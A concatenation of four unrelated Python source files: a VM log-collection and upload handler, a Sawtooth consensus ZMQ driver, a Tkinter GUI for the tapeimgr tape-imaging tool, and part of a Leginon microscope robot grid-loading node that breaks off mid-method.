op=WALAEventOperation.LogCollection,
is_success=is_allowed,
message=msg,
log_event=False)
return is_allowed
class CollectLogsHandler(object):
"""
Periodically collects and uploads logs from the VM to the host.
"""
_THREAD_NAME = "CollectLogsHandler"
@staticmethod
def get_thread_name():
return CollectLogsHandler._THREAD_NAME
def __init__(self):
self.protocol = None
self.protocol_util = None
self.event_thread = None
self.should_run = True
self.last_state = None
self._periodic_operations = [
PeriodicOperation("collect_and_send_logs", self.collect_and_send_logs, conf.get_collect_logs_period())
]
def run(self):
self.start(init_data=True)
def is_alive(self):
return self.event_thread.is_alive()
def start(self, init_data=False):
self.event_thread = threading.Thread(target=self.daemon, args=(init_data,))
self.event_thread.setDaemon(True)
self.event_thread.setName(self.get_thread_name())
self.event_thread.start()
def join(self):
self.event_thread.join()
def stopped(self):
return not self.should_run
def stop(self):
self.should_run = False
if self.is_alive():
self.join()
def init_protocols(self):
# The initialization of ProtocolUtil for the log collection thread should be done within the thread itself
# rather than initializing it in the ExtHandler thread. This is done to avoid any concurrency issues as each
# thread would now have its own ProtocolUtil object as per the SingletonPerThread model.
self.protocol_util = get_protocol_util()
self.protocol = self.protocol_util.get_protocol()
def daemon(self, init_data=False):
try:
if init_data:
self.init_protocols()
while not self.stopped():
try:
for op in self._periodic_operations: # pylint: disable=C0103
op.run()
except Exception as e: # pylint: disable=C0103
logger.error("An error occurred in the log collection thread main loop; "
"will skip the current iteration.\n{0}", ustr(e))
finally:
PeriodicOperation.sleep_until_next_operation(self._periodic_operations)
except Exception as e: # pylint: disable=C0103
logger.error("An error occurred in the log collection thread; will exit the thread.\n{0}", ustr(e))
def collect_and_send_logs(self):
if self._collect_logs():
self._send_logs()
@staticmethod
def _get_resource_limits():
# Define CPU limit (as percentage of CPU time) and memory limit (absolute value in megabytes).
cpu_limit = "5%"
memory_limit = "30M" # K for kb, M for mb
return cpu_limit, memory_limit
@staticmethod
def _collect_logs():
logger.info("Starting log collection...")
# Invoke the command line tool in the agent to collect logs, with resource limits on CPU and memory (RAM).
scope_name = "collect-logs-{0}.scope".format(ustr(int(time.time() * 1000000)))
systemd_cmd = ["systemd-run", "--unit={0}".format(scope_name), "--scope"]
# More info on resource limits properties in systemd here:
# https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/resource_management_guide/sec-modifying_control_groups
cpu_limit, memory_limit = CollectLogsHandler._get_resource_limits()
resource_limits = ["--property=CPUAccounting=1", "--property=CPUQuota={0}".format(cpu_limit),
"--property=MemoryAccounting=1", "--property=MemoryLimit={0}".format(memory_limit)]
# The log tool is invoked from the current agent's egg with the command line option
collect_logs_cmd = [sys.executable, "-u", sys.argv[0], "-collect-logs"]
final_command = systemd_cmd + resource_limits + collect_logs_cmd
start_time = datetime.datetime.utcnow()
success = False
msg = None
try:
shellutil.run_command(final_command, log_error=True)
duration = elapsed_milliseconds(start_time)
archive_size = os.path.getsize(COMPRESSED_ARCHIVE_PATH)
msg = "Successfully collected logs. Archive size: {0} b, elapsed time: {1} ms.".format(archive_size,
duration)
logger.info(msg)
success = True
return True
except Exception as e: # pylint: disable=C0103
duration = elapsed_milliseconds(start_time)
if isinstance(e, CommandError):
exception_message = ustr("[stderr] %s", e.stderr) # pylint: disable=no-member
else:
exception_message = ustr(e)
msg = "Failed to collect logs. Elapsed time: {0} ms. Error: {1}".format(duration, exception_message)
# No need to log to the local log since we ran run_command with logging errors as enabled
return False
finally:
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.LogCollection,
is_success=success,
message=msg,
log_event=False)
def _send_logs(self):
msg = None
success = False
try:
with open(COMPRESSED_ARCHIVE_PATH, "rb") as fh: # pylint: disable=C0103
archive_content = fh.read()
self.protocol.upload_logs(archive_content)
msg = "Successfully uploaded logs."
logger.info(msg)
success = True
except Exception as e: # pylint: disable=C0103
msg = "Failed to upload logs. Error: {0}".format(ustr(e))
logger.warn(msg)
finally:
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.LogCollection,
is_success=success,
message=msg,
log_event=False)
|
zmq_driver.py
|
# Copyright 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
import concurrent
import logging
from queue import Queue
from threading import Thread
from sawtooth_sdk.consensus.driver import Driver
from sawtooth_sdk.consensus.engine import StartupState
from sawtooth_sdk.consensus.zmq_service import ZmqService
from sawtooth_sdk.consensus import exceptions
from sawtooth_sdk.messaging.stream import Stream
from sawtooth_sdk.protobuf import consensus_pb2
from sawtooth_sdk.protobuf.validator_pb2 import Message
LOGGER = logging.getLogger(__name__)
REGISTER_TIMEOUT = 800
SERVICE_TIMEOUT = 800
class ZmqDriver(Driver):
def __init__(self, engine):
super().__init__(engine)
self._engine = engine
self._stream = None
self._exit = False
self._updates = None
def start(self, endpoint):
LOGGER.debug('ZmqDriver: start endpoint=%s',endpoint)
self._stream = Stream(endpoint)
startup_state = self._register()
self._updates = Queue()
driver_thread = Thread(
target=self._driver_loop)
driver_thread.start()
try:
self._engine.start(
self._updates,
ZmqService(
stream=self._stream,
timeout=SERVICE_TIMEOUT,
name=self._engine.name(),
version=self._engine.version()),
startup_state)
except Exception as ex: # pylint: disable=broad-except
LOGGER.exception("Uncaught engine exception(%s)",ex)
self.stop()
driver_thread.join()
def _driver_loop(self):
try:
future = self._stream.receive()
LOGGER.debug('ZmqDriver: _driver_loop future=%s',future)
while True:
if self._exit:
self._engine.stop()
break
try:
message = future.result(1)
future = self._stream.receive()
except concurrent.futures.TimeoutError:
continue
#LOGGER.debug('ZmqDriver: _driver_loop _process')
result = self._process(message)
self._updates.put(result)
except Exception: # pylint: disable=broad-except
LOGGER.exception("Uncaught driver exception")
def stop(self):
self._exit = True
self._engine.stop()
self._stream.close()
def _register(self):
self._stream.wait_for_ready()
request = consensus_pb2.ConsensusRegisterRequest(
name=self._engine.name(),
version=self._engine.version(),
).SerializeToString()
while True:
future = self._stream.send(
message_type=Message.CONSENSUS_REGISTER_REQUEST,
content=request)
response = consensus_pb2.ConsensusRegisterResponse()
response.ParseFromString(future.result(REGISTER_TIMEOUT).content)
if (
response.status
== consensus_pb2.ConsensusRegisterResponse.NOT_READY
):
#LOGGER.debug('ZmqDriver:register NOT_READY: url=%s',self._stream._url)
continue
if response.status == consensus_pb2.ConsensusRegisterResponse.OK :
LOGGER.debug('ZmqDriver:register DONE: url=%s',self._stream._url)
return StartupState(
response.chain_head,
response.peers,
response.local_peer_info,
response.peering_mode)
raise exceptions.ReceiveError(
'Registration failed with status {}'.format(response.status))
def _process(self, message):
type_tag = message.message_type
if type_tag == Message.CONSENSUS_NOTIFY_PEER_CONNECTED:
notification = consensus_pb2.ConsensusNotifyPeerConnected()
notification.ParseFromString(message.content)
data = notification.peer_info, notification.status, notification.mode , notification.info
elif type_tag == Message.CONSENSUS_NOTIFY_PEER_DISCONNECTED:
notification = consensus_pb2.ConsensusNotifyPeerDisconnected()
notification.ParseFromString(message.content)
data = notification.peer_id
elif type_tag == Message.CONSENSUS_NOTIFY_PEER_MESSAGE:
notification = consensus_pb2.ConsensusNotifyPeerMessage()
notification.ParseFromString(message.content)
data = notification.message, notification.sender_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_NEW:
notification = consensus_pb2.ConsensusNotifyBlockNew()
notification.ParseFromString(message.content)
data = notification.block
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_VALID:
notification = consensus_pb2.ConsensusNotifyBlockValid()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_INVALID:
notification = consensus_pb2.ConsensusNotifyBlockInvalid()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_COMMIT:
notification = consensus_pb2.ConsensusNotifyBlockCommit()
notification.ParseFromString(message.content)
data = notification.block_id
else:
raise exceptions.ReceiveError(
'Received unexpected message type: {}'.format(type_tag))
self._stream.send_back(
message_type=Message.CONSENSUS_NOTIFY_ACK,
correlation_id=message.correlation_id,
content=consensus_pb2.ConsensusNotifyAck().SerializeToString())
return type_tag, data
|
gui.py
|
#! /usr/bin/env python3
"""
Tapeimgr, automated reading of tape
Graphical user interface
Author: Johan van der Knijff
Research department, KB / National Library of the Netherlands
"""
import sys
import os
import time
import threading
import logging
import queue
import uuid
from pathlib import Path
import tkinter as tk
from tkinter import filedialog as tkFileDialog
from tkinter import scrolledtext as ScrolledText
from tkinter import messagebox as tkMessageBox
from tkinter import ttk
from tkfilebrowser import askopendirname
from .tape import Tape
from . import config
class tapeimgrGUI(tk.Frame):
"""This class defines the graphical user interface + associated functions
for associated actions
"""
def __init__(self, parent, *args, **kwargs):
"""Initiate class"""
tk.Frame.__init__(self, parent, *args, **kwargs)
self.root = parent
# Logging stuff
self.logger = logging.getLogger()
# Create a logging handler using a queue
self.log_queue = queue.Queue(-1)
self.queue_handler = QueueHandler(self.log_queue)
# Create tape instance
self.tape = Tape()
self.t1 = None
# Read configuration file
self.tape.getConfiguration()
# Set dirOut, depending on whether value from config is a directory
if os.path.isdir(self.tape.defaultDir):
self.tape.dirOut = self.tape.defaultDir
else:
self.tape.dirOut = os.path.expanduser("~")
# Build the GUI
self.build_gui()
def on_quit(self, event=None):
"""Quit tapeimgr"""
os._exit(0)
def on_submit(self, event=None):
"""fetch and validate entered input, and start processing"""
# This flag is true if all input validates
inputValidateFlag = True
# Fetch entered values (strip any leading / trailing whitespace characters)
self.tape.tapeDevice = self.tapeDevice_entry.get().strip()
self.tape.initBlockSize = self.initBlockSize_entry.get().strip()
self.tape.files = self.files_entry.get().strip()
self.tape.prefix = self.prefix_entry.get().strip()
self.tape.extension = self.extension_entry.get().strip()
self.tape.identifier = self.identifier_entry.get().strip()
self.tape.description = self.description_entry.get().strip()
self.tape.notes = self.notes_entry.get(1.0, tk.END).strip()
self.tape.fillBlocks = self.fBlocks.get()
# Validate input
self.tape.validateInput()
# Show error message for any parameters that didn't pass validation
if not self.tape.dirOutIsDirectory:
inputValidateFlag = False
msg = ("Output directory doesn't exist:\n" + self.tape.dirOut)
tkMessageBox.showerror("ERROR", msg)
if not self.tape.dirOutIsWritable:
inputValidateFlag = False
msg = ('Cannot write to directory ' + self.tape.dirOut)
tkMessageBox.showerror("ERROR", msg)
if not self.tape.deviceAccessibleFlag:
inputValidateFlag = False
msg = ('Tape device is not accessible')
tkMessageBox.showerror("ERROR", msg)
if not self.tape.blockSizeIsValid:
inputValidateFlag = False
msg = ('Block size not valid')
tkMessageBox.showerror("ERROR", msg)
if not self.tape.filesIsValid:
inputValidateFlag = False
msg = ('Files value not valid\n'
'(must be comma-delimited string of integer numbers, or empty)')
tkMessageBox.showerror("ERROR", msg)
# Ask confirmation if output files exist already
outDirConfirmFlag = True
if self.tape.outputExistsFlag:
msg = ('writing to ' + self.tape.dirOut + ' will overwrite existing files!\n'
'press OK to continue, otherwise press Cancel ')
outDirConfirmFlag = tkMessageBox.askokcancel("Overwrite files?", msg)
if inputValidateFlag and outDirConfirmFlag:
# Start logger
successLogger = True
try:
self.setupLogger()
# Start polling log messages from the queue
self.after(100, self.poll_log_queue)
except OSError:
# Something went wrong while trying to write to lof file
msg = ('error trying to write log file to ' + self.tape.logFile)
tkMessageBox.showerror("ERROR", msg)
successLogger = False
if successLogger:
# Disable data entry widgets
self.outDirButton_entry.config(state='disabled')
self.tapeDevice_entry.config(state='disabled')
self.initBlockSize_entry.config(state='disabled')
self.decreaseBSButton.config(state='disabled')
self.increaseBSButton.config(state='disabled')
self.files_entry.config(state='disabled')
self.prefix_entry.config(state='disabled')
self.extension_entry.config(state='disabled')
self.fillblocks_entry.config(state='disabled')
self.identifier_entry.config(state='disabled')
self.uuidButton.config(state='disabled')
self.description_entry.config(state='disabled')
self.notes_entry.config(state='disabled')
self.start_button.config(state='disabled')
self.quit_button.config(state='disabled')
# Launch tape processing function as subprocess
self.t1 = threading.Thread(target=self.tape.processTape)
self.t1.start()
def selectOutputDirectory(self, event=None):
"""Select output directory"""
dirInit = self.tape.dirOut
self.tape.dirOut = askopendirname(initialdir=dirInit)
if self.tape.dirOut != '':
self.outDirLabel['text'] = self.tape.dirOut
def decreaseBlocksize(self):
"""Decrease value of initBlockSize"""
try:
blockSizeOld = int(self.initBlockSize_entry.get().strip())
except ValueError:
# Reset if user manually entered something weird
blockSizeOld = int(self.tape.initBlockSizeDefault)
blockSizeNew = max(blockSizeOld - 512, 512)
self.initBlockSize_entry.delete(0, tk.END)
self.initBlockSize_entry.insert(tk.END, str(blockSizeNew))
def increaseBlocksize(self):
"""Increase value of initBlockSize"""
try:
blockSizeOld = int(self.initBlockSize_entry.get().strip())
except ValueError:
# Reset if user manually entered something weird
blockSizeOld = int(self.tape.initBlockSizeDefault)
blockSizeNew = blockSizeOld + 512
self.initBlockSize_entry.delete(0, tk.END)
self.initBlockSize_entry.insert(tk.END, str(blockSizeNew))
def insertUUID(self, event=None):
"""Insert UUID into identifier field"""
myID = str(uuid.uuid1())
self.identifier_entry.delete(0, tk.END)
self.identifier_entry.insert(tk.END, myID)
def build_gui(self):
"""Build the GUI"""
self.root.title('tapeimgr v.' + config.version)
self.root.option_add('*tearOff', 'FALSE')
self.grid(column=0, row=0, sticky='w')
self.grid_columnconfigure(0, weight=0, pad=0)
self.grid_columnconfigure(1, weight=0, pad=0)
self.grid_columnconfigure(2, weight=0, pad=0)
self.grid_columnconfigure(3, weight=0, pad=0)
# Entry elements
ttk.Separator(self, orient='horizontal').grid(column=0, row=0, columnspan=4, sticky='ew')
# Output Directory
self.outDirButton_entry = tk.Button(self,
text='Select Output Directory',
underline=14,
command=self.selectOutputDirectory,
width=20)
self.outDirButton_entry.grid(column=0, row=3, sticky='w')
self.outDirLabel = tk.Label(self, text=self.tape.dirOut)
self.outDirLabel.update()
self.outDirLabel.grid(column=1, row=3, sticky='w')
ttk.Separator(self, orient='horizontal').grid(column=0, row=5, columnspan=4, sticky='ew')
# Tape Device
tk.Label(self, text='Tape Device').grid(column=0, row=6, sticky='w')
self.tapeDevice_entry = tk.Entry(self, width=20)
self.tapeDevice_entry['background'] = 'white'
self.tapeDevice_entry.insert(tk.END, self.tape.tapeDevice)
self.tapeDevice_entry.grid(column=1, row=6, sticky='w')
# Initial Block Size
tk.Label(self, text='Initial Block Size').grid(column=0, row=7, sticky='w')
self.initBlockSize_entry = tk.Entry(self, width=20)
self.initBlockSize_entry['background'] = 'white'
self.initBlockSize_entry.insert(tk.END, self.tape.initBlockSize)
self.initBlockSize_entry.grid(column=1, row=7, sticky='w')
self.decreaseBSButton = tk.Button(self, text='-', command=self.decreaseBlocksize, width=1)
self.decreaseBSButton.grid(column=1, row=7, sticky='e')
self.increaseBSButton = tk.Button(self, text='+', command=self.increaseBlocksize, width=1)
self.increaseBSButton.grid(column=2, row=7, sticky='w')
# Files
tk.Label(self, text='Files (comma-separated list)').grid(column=0, row=8, sticky='w')
self.files_entry = tk.Entry(self, width=20)
self.files_entry['background'] = 'white'
self.files_entry.insert(tk.END, self.tape.files)
self.files_entry.grid(column=1, row=8, sticky='w')
# Prefix
tk.Label(self, text='Prefix').grid(column=0, row=9, sticky='w')
self.prefix_entry = tk.Entry(self, width=20)
self.prefix_entry['background'] = 'white'
self.prefix_entry.insert(tk.END, self.tape.prefix)
self.prefix_entry.grid(column=1, row=9, sticky='w')
# Extension
tk.Label(self, text='Extension').grid(column=0, row=10, sticky='w')
self.extension_entry = tk.Entry(self, width=20)
self.extension_entry['background'] = 'white'
self.extension_entry.insert(tk.END, self.tape.extension)
self.extension_entry.grid(column=1, row=10, sticky='w')
# Fill failed blocks
tk.Label(self, text='Fill failed blocks').grid(column=0, row=11, sticky='w')
self.fBlocks = tk.BooleanVar()
self.fBlocks.set(self.tape.fillBlocks)
self.fillblocks_entry = tk.Checkbutton(self, variable=self.fBlocks)
self.fillblocks_entry.grid(column=1, row=11, sticky='w')
ttk.Separator(self, orient='horizontal').grid(column=0, row=12, columnspan=4, sticky='ew')
# Identifier entry field
tk.Label(self, text='Identifier').grid(column=0, row=13, sticky='w')
self.identifier_entry = tk.Entry(self, width=20)
self.identifier_entry['background'] = 'white'
self.identifier_entry.insert(tk.END, self.tape.identifier)
self.identifier_entry.grid(column=1, row=13, sticky='w')
self.uuidButton = tk.Button(self, text='UUID', underline=0,
command=self.insertUUID, width=2)
self.uuidButton.grid(column=1, row=13, sticky='e')
# Description entry field
tk.Label(self, text='Description').grid(column=0, row=14, sticky='w')
self.description_entry = tk.Entry(self, width=35)
self.description_entry['background'] = 'white'
self.description_entry.insert(tk.END, self.tape.description)
self.description_entry.grid(column=1, row=14, sticky='w', columnspan=1)
# Notes entry field
tk.Label(self, text='Notes').grid(column=0, row=15, sticky='w')
self.notes_entry = tk.Text(self, height=6, width=35)
self.notes_entry['background'] = 'white'
self.notes_entry.insert(tk.END, self.tape.notes)
self.notes_entry.grid(column=1, row=15, sticky='w', columnspan=1)
ttk.Separator(self, orient='horizontal').grid(column=0, row=16, columnspan=4, sticky='ew')
self.start_button = tk.Button(self,
text='Start',
width=10,
underline=0,
command=self.on_submit)
self.start_button.grid(column=1, row=17, sticky='w')
self.quit_button = tk.Button(self,
text='Exit',
width=10,
underline=0,
command=self.on_quit)
self.quit_button.grid(column=1, row=17, sticky='e')
ttk.Separator(self, orient='horizontal').grid(column=0, row=18, columnspan=4, sticky='ew')
# Add ScrolledText widget to display logging info
self.st = ScrolledText.ScrolledText(self, state='disabled', height=15)
self.st.configure(font='TkFixedFont')
self.st['background'] = 'white'
self.st.grid(column=0, row=19, sticky='ew', columnspan=4)
# Define bindings for keyboard shortcuts: buttons
self.root.bind_all('<Control-Key-d>', self.selectOutputDirectory)
self.root.bind_all('<Control-Key-s>', self.on_submit)
self.root.bind_all('<Control-Key-e>', self.on_quit)
self.root.bind_all('<Control-Key-u>', self.insertUUID)
for child in self.winfo_children():
child.grid_configure(padx=5, pady=5)
# Display message and exit if config file could not be read
if not self.tape.configSuccess:
msg = ("Error reading configuration file! \n" +
"Run '(sudo) tapeimgr-config' to fix this.")
errorExit(msg)
def reset_gui(self, dirOut):
"""Reset the GUI"""
# Create new tape instance
self.tape = Tape()
# Read configuration
self.tape.getConfiguration()
# Set dirOut
self.tape.dirOut = dirOut
# Logging stuff
self.logger = logging.getLogger()
# Create a logging handler using a queue
self.log_queue = queue.Queue(-1)
self.queue_handler = QueueHandler(self.log_queue)
# enable data entry widgets
self.outDirButton_entry.config(state='normal')
self.tapeDevice_entry.config(state='normal')
self.initBlockSize_entry.config(state='normal')
self.decreaseBSButton.config(state='normal')
self.increaseBSButton.config(state='normal')
self.files_entry.config(state='normal')
self.prefix_entry.config(state='normal')
self.extension_entry.config(state='normal')
self.fillblocks_entry.config(state='normal')
self.identifier_entry.config(state='normal')
self.uuidButton.config(state='normal')
self.description_entry.config(state='normal')
self.notes_entry.config(state='normal')
self.start_button.config(state='normal')
self.quit_button.config(state='normal')
# Reset all entry widgets
self.outDirLabel['text'] = self.tape.dirOut
self.tapeDevice_entry.delete(0, tk.END)
self.tapeDevice_entry.insert(tk.END, self.tape.tapeDevice)
self.initBlockSize_entry.delete(0, tk.END)
self.initBlockSize_entry.insert(tk.END, self.tape.initBlockSize)
self.files_entry.delete(0, tk.END)
self.files_entry.insert(tk.END, self.tape.files)
self.prefix_entry.delete(0, tk.END)
self.prefix_entry.insert(tk.END, self.tape.prefix)
self.extension_entry.delete(0, tk.END)
self.extension_entry.insert(tk.END, self.tape.extension)
self.identifier_entry.delete(0, tk.END)
self.identifier_entry.insert(tk.END, self.tape.identifier)
self.description_entry.delete(0, tk.END)
self.description_entry.insert(tk.END, self.tape.description)
self.notes_entry.delete(1.0, tk.END)
self.notes_entry.insert(tk.END, self.tape.notes)
self.fBlocks.set(self.tape.fillBlocks)
self.start_button.config(state='normal')
self.quit_button.config(state='normal')
def setupLogger(self):
"""Set up logger configuration"""
# Basic configuration
logging.basicConfig(filename=self.tape.logFile,
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s')
# Add the handler to logger
self.logger = logging.getLogger()
# This sets the console output format (slightly different from basicConfig!)
formatter = logging.Formatter('%(levelname)s: %(message)s')
self.queue_handler.setFormatter(formatter)
self.logger.addHandler(self.queue_handler)
def display(self, record):
"""Display log record in scrolledText widget"""
msg = self.queue_handler.format(record)
self.st.configure(state='normal')
self.st.insert(tk.END, msg + '\n', record.levelname)
self.st.configure(state='disabled')
# Autoscroll to the bottom
self.st.yview(tk.END)
def poll_log_queue(self):
"""Check every 100ms if there is a new message in the queue to display"""
while True:
try:
record = self.log_queue.get(block=False)
except queue.Empty:
break
else:
self.display(record)
self.after(100, self.poll_log_queue)
class QueueHandler(logging.Handler):
"""Class to send logging records to a queue
It can be used from different threads
The ConsoleUi class polls this queue to display records in a ScrolledText widget
Taken from https://github.com/beenje/tkinter-logging-text-widget/blob/master/main.py
"""
def __init__(self, log_queue):
super().__init__()
self.log_queue = log_queue
def emit(self, record):
self.log_queue.put(record)
def checkDirExists(dirIn):
"""Check if directory exists and exit if not"""
if not os.path.isdir(dirIn):
msg = ('directory ' + dirIn + ' does not exist!')
tkMessageBox.showerror("Error", msg)
sys.exit(1)
def errorExit(error):
"""Show error message in messagebox and then exit after user presses OK"""
tkMessageBox.showerror("Error", error)
os._exit(1)
def main():
"""Main function"""
packageDir = os.path.dirname(os.path.abspath(__file__))
root = tk.Tk()
root.iconphoto(True, tk.PhotoImage(file=os.path.join(packageDir, 'icons', 'tapeimgr.png')))
myGUI = tapeimgrGUI(root)
# This ensures application quits normally if user closes window
root.protocol('WM_DELETE_WINDOW', myGUI.on_quit)
while True:
try:
root.update_idletasks()
root.update()
time.sleep(0.1)
if myGUI.tape.finishedFlag:
myGUI.t1.join()
#myGUI.logger.removeHandler(myGUI.queue_handler)
#myGUI.queue_handler.close()
handlers = myGUI.logger.handlers[:]
for handler in handlers:
handler.close()
myGUI.logger.removeHandler(handler)
if myGUI.tape.tapeDeviceIOError:
# Tape device not accessible
msg = ('Cannot access tape device ' + myGUI.tape.tapeDevice +
'. Check that device exits, and that tapeimgr is run as root')
errorExit(msg)
elif myGUI.tape.successFlag:
# Tape extraction completed with no errors
msg = ('Tape processed successfully without errors')
tkMessageBox.showinfo("Success", msg)
else:
# Tape extraction resulted in errors
msg = ('One or more errors occurred while processing tape, '
'check log file for details')
tkMessageBox.showwarning("Errors occurred", msg)
# Reset dirOut to parent dir of current value (returns root
# dir if dirOut is root)
dirOutNew = str(Path(myGUI.tape.dirOut).parent)
# Reset the GUI
myGUI.reset_gui(dirOutNew)
except Exception as e:
# Unexpected error
msg = 'An unexpected error occurred, see log file for details'
logging.error(e, exc_info=True)
errorExit(msg)
if __name__ == "__main__":
main()
|
robot.py
|
#
# COPYRIGHT:
# The Leginon software is Copyright 2003
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
from PIL import Image
import sys
import threading
import time
from leginon import leginondata
import emailnotification
import event
import instrument
import node
import project
import gui.wx.Robot
# ...
def seconds2str(seconds):
seconds = int(seconds)
minute = 60
hour = 60*minute
day = 24*hour
week = 7*day
weeks = seconds / week
string = ''
if weeks:
if weeks == 1:
value = ''
else:
value = 's'
string += '%i week%s, ' % (weeks, value)
seconds %= week
days = seconds / day
if days or string:
if days == 1:
value = ''
else:
value = 's'
string += '%i day%s, ' % (days, value)
seconds %= day
hours = seconds / hour
if hours or string:
if hours == 1:
value = ''
else:
value = 's'
string += '%i hour%s, ' % (hours, value)
seconds %= hour
minutes = seconds / minute
if minutes or string:
if minutes == 1:
value = ''
else:
value = 's'
string += '%i minute%s, ' % (minutes, value)
seconds %= minute
if seconds or string:
if seconds == 1:
value = ''
else:
value = 's'
string += '%i second%s' % (seconds, value)
return string
class TestCommunication(object):
def __init__(self):
self.gridNumber = -1
for i in range(11):
setattr(self, 'Signal' + str(i), 0)
class RobotException(Exception):
pass
class GridException(Exception):
pass
class GridQueueEmpty(GridException):
pass
class GridLoadError(GridException):
pass
class GridLoadFromTrayError(GridException):
pass
class GridUnloadError(GridException):
pass
def validateGridNumber(gridnumber):
if not isinstance(gridnumber, int):
return False
if gridnumber >= 1 and gridnumber <= 96:
return True
else:
return False
class Request(object):
def __init__(self):
self.event = threading.Event()
class ExitRequest(Request):
pass
class GridRequest(Request):
def __init__(self, number, gridid=None, node=None, griddata=None):
Request.__init__(self)
self.number = number
self.loaded = False
self.gridid = gridid
self.node = node
self.griddata = griddata
import Queue
class Robot(node.Node):
panelclass = gui.wx.Robot.Panel
eventinputs = node.Node.eventinputs + [event.TargetListDoneEvent,
event.UnloadGridEvent,
event.QueueGridEvent,
event.QueueGridsEvent,
event.MosaicDoneEvent]
eventoutputs = node.Node.eventoutputs + [event.MakeTargetListEvent,
event.GridLoadedEvent,
event.EmailEvent]
settingsclass = leginondata.RobotSettingsData
defaultsettings = {
'column pressure threshold': 3.5e-5,
'default Z position': -140e-6,
'simulate': False,
'turbo on': True,
'pause': False,
'grid tray': None,
'grid clear wait': False,
}
defaultcolumnpressurethreshold = 3.5e-5
defaultzposition = -140e-6
def __init__(self, id, session, managerlocation, **kwargs):
node.Node.__init__(self, id, session, managerlocation, **kwargs)
self.instrument = instrument.Proxy(self.objectservice, self.session)
self.timings = {}
self.gridnumber = None
self.startevent = threading.Event()
self.exitevent = threading.Event()
self.extractinfo = None
self.extractcondition = threading.Condition()
self.gridcleared = threading.Event()
self.usercontinue = threading.Event()
self.emailclient = emailnotification.EmailClient(self)
self.simulate = False
self.startnowait = False
self.traysFromDB()
self.queue = Queue.Queue()
threading.Thread(name='robot control queue handler thread',
target=self._queueHandler).start()
self.addEventInput(event.MosaicDoneEvent, self.handleGridDataCollectionDone)
self.addEventInput(event.TargetListDoneEvent,
self.handleGridDataCollectionDone)
self.addEventInput(event.QueueGridEvent, self.handleQueueGrid)
self.addEventInput(event.QueueGridsEvent, self.handleQueueGrids)
self.addEventInput(event.UnloadGridEvent, self.handleUnloadGrid)
self.start()
def traysFromDB(self):
# if label is same, kinda screwed
self.gridtrayids = {}
self.gridtraylabels = {}
try:
projectdata = project.ProjectData()
gridboxes = projectdata.getGridBoxes()
for i in gridboxes.getall():
self.gridtrayids[i['label']] = i['gridboxId']
self.gridtraylabels[i['gridboxId']] = i['label']
except Exception, e:
self.logger.error('Failed to connect to the project database: %s' % e)
def userContinue(self):
self.usercontinue.set()
def handleQueueGrids(self, ievent):
'''
Handle queue of grids from another node.
Wait for user to click start before inserting into the queue.
'''
# wait for user to start
self.logger.info('Grid load request has been made' + ', press \'Start\' button to begin processing')
self.setStatus('user input')
self.startevent.clear()
self.startevent.wait()
nodename = ievent['node']
# insert all the grids before handling them
for gridid in ievent['grid IDs']:
number = self.getGridNumber(gridid)
while number is None:
self.setStatus('idle')
self.logger.info('Waiting for user to switch tray')
self.setStatus('user input')
self.panel.onWaitForTrayChanged()
self.startevent.clear()
self.startevent.wait()
number = self.getGridNumber(gridid)
request = GridRequest(number, gridid, nodename)
self.queue.put(request)
self.startnowait = True
self._queueHandler()
def handleQueueGrid(self, ievent):
newevent = {}
newevent['node'] = ievent['node']
newevent['grid IDs'] = [ievent['grid ID'],]
self.handleQueueGrids(newevent)
def handleUnloadGrid(self, evt):
gridid = evt['grid ID']
node = evt['node']
self.extractcondition.acquire()
self.extractinfo = (gridid, node)
self.extractcondition.notify()
self.extractcondition.release()
def _queueHandler(self):
self.logger.info('_queueHandler '+str(self.simulate)+' setting'+str(self.settings['simulate']))
if self.simulate:
self.communication = TestCommunication()
communication_good = TestCommunication()
else:
try:
import pythoncom
import win32com.client
pythoncom.CoInitializeEx(pythoncom.COINIT_MULTITHREADED)
communication_good = win32com.client.Dispatch(
'RobotCommunications.Signal')
self.communication = communication_good
except:
self.logger.warning(
'Cannot initialize robot communications, starting in simulation mode'
)
self.simulate = True
self.communication = TestCommunication()
communication_good = TestCommunication()
request = None
self.communication.Signal11 = int(self.settings['grid clear wait'])
while True:
### need to wait if something goes wrong
if not self.startnowait:
self.usercontinue.clear()
self.usercontinue.wait()
if self.exitevent.isSet():
break
while True:
try:
request = self.queue.get(block=False)
if isinstance(request, ExitRequest):
break
except Queue.Empty:
request = self.getUserGridRequest()
if request is None:
self.startnowait = False
break
gridid = request.gridid
evt = event.GridLoadedEvent()
evt['request node'] = request.node
evt['grid'] = leginondata.GridData(initializer={'grid ID': gridid})
evt['status'] = 'failed'
gridnumber = request.number
self.selectGrid(gridnumber)
if gridnumber is None:
evt['status'] = 'invalid'
self.outputEvent(evt)
return
if self.settings['simulate']:
self.communication = TestCommunication()
else:
self.communication = communication_good
self.setStatus('processing')
self.selectGrid(gridnumber)
self.logger.info('grid selected')
self.gridnumber = gridnumber
try:
griddata = self.insert()
except GridLoadError:
self.gridnumber = None
continue
except GridLoadFromTrayError:
self.gridnumber = None
self.startnowait = True
self.outputEvent(evt)
request.event.set()
continue
self.setStatus('idle')
evt['grid'] = griddata
if griddata is None:
break
self.startnowait = False
if hasattr(request, 'loaded'):
evt['status'] = 'ok'
if hasattr(request, 'griddata'):
request.griddata = griddata
self.outputEvent(evt)
request.event.set()
self.extractcondition.acquire()
if request.gridid is None and request.node is None:
self.panel.gridInserted()
while (self.extractinfo is None
or self.extractinfo != (request.gridid, request.node)):
self.extractcondition.wait()
if self.settings['simulate']:
